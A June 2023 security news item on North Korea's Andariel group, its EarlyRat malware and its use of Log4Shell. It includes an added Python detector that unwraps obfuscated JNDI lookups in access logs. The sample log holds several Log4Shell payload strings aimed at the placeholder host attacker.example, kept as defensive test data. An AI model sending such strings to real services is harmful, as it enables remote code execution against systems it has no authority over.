North Korean Hacker Group Andariel Strikes with New EarlyRat Malware
Security News, June 2023

The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented malware called EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year.
"Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control server," Kaspersky said in a new report.
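The initial-access step described above, Log4Shell exploitation, works by getting a JNDI lookup string such as `${jndi:ldap://host/x}` into input that a vulnerable Log4j 2 instance logs; the library then fetches and runs attacker-supplied code, which is where the "downloads further malware" stage begins. The detector below is an added example written for this page, not code from Kaspersky's report or from the Andariel toolset, and it goes beyond the article by also unwrapping the nested-lookup (`${${lower:j}ndi:...}`, `${::-j}`, `${env:X:-j}`) and URL-encoded evasions that real-world exploit traffic used. The access-log lines, the `attacker.example` host and the 198.51.100.x addresses are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body containing no nested braces.
_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# A fully de-obfuscated JNDI lookup and the protocol it targets.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):[^{}]*\}", re.IGNORECASE)

# Constructed combined-format access log; hosts and addresses are placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Mar/2022:10:03:11 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.8 - - [01/Mar/2022:10:03:12 +0000] "GET / HTTP/1.1" 200 5120 "-" "${jndi:ldap://attacker.example:1389/a}"
198.51.100.9 - - [01/Mar/2022:10:03:13 +0000] "GET / HTTP/1.1" 200 5120 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.example/b}"
198.51.100.10 - - [01/Mar/2022:10:03:14 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 312 "-" "curl/7.79.1"
198.51.100.11 - - [01/Mar/2022:10:03:15 +0000] "GET / HTTP/1.1" 200 5120 "-" "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-d}ns${env:BARFOO:-:}//attacker.example/d}"
198.51.100.12 - - [01/Mar/2022:10:03:16 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""


def _resolve(match):
    """Emulate the Log4j 2 lookups attackers use to disguise the string 'jndi'.

    Handles ${lower:X}, ${upper:X} and the default-value syntax (${name:key:-X},
    ${::-X}, ${:-X}), which Log4j evaluates to X when the lookup yields nothing.
    A real ${jndi:...} lookup and anything unknown are returned literally so the
    detector can see them.
    """
    body = match.group(1)
    prefix, sep, rest = body.partition(":")
    if not sep:
        return match.group(0)
    name = prefix.lower()
    if name == "jndi":
        return match.group(0)
    if ":-" in body:
        return body.split(":-", 1)[1]
    if name == "lower":
        return rest.lower()
    if name == "upper":
        return rest.upper()
    return match.group(0)


def normalize(text, max_rounds=16):
    """URL-decode and collapse nested lookups, innermost first, until stable."""
    for _ in range(max_rounds):
        resolved = _LOOKUP.sub(_resolve, unquote(text))
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi(text):
    """Return (scheme, lookup) for every JNDI lookup found after normalization."""
    norm = normalize(text)
    return [(m.group(1).lower(), m.group(0)) for m in _JNDI.finditer(norm)]


def scan_log(text):
    """Scan combined-format access log lines; one finding per JNDI lookup."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        client = line.split(" ", 1)[0]  # first field is the client address
        for scheme, lookup in find_jndi(line):
            findings.append(
                {"line": line_no, "client": client, "scheme": scheme, "lookup": lookup}
            )
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} {hit['scheme']} {hit['lookup']}")
```

Matching on request content is only a first pass: it catches the attempt, not the outcome. Pair it with the higher-fidelity signal of the Java process itself opening outbound LDAP, RMI or DNS connections to hosts it has no business talking to, which is the moment the lookup is actually resolved.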
Also called Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, a primary hacking unit that also houses APT38 and other subordinate elements collectively tracked under the umbrella name Lazarus Group.
The latest attack chain discovered by Kaspersky shows that EarlyRat is propagated by means of phishing emails containing decoy Microsoft Word documents.
"Despite being an APT group, Lazarus is known for performing typical cybercrime tasks, such as deploying ransomware, which makes the cybercrime landscape more complicated," Kaspersky said.
"Moreover, the group uses a wide variety of custom tools, constantly updating existing and developing new malware."
News URL
https://thehackernews.com/2023/06/north-korean-hacker-group-andariel.html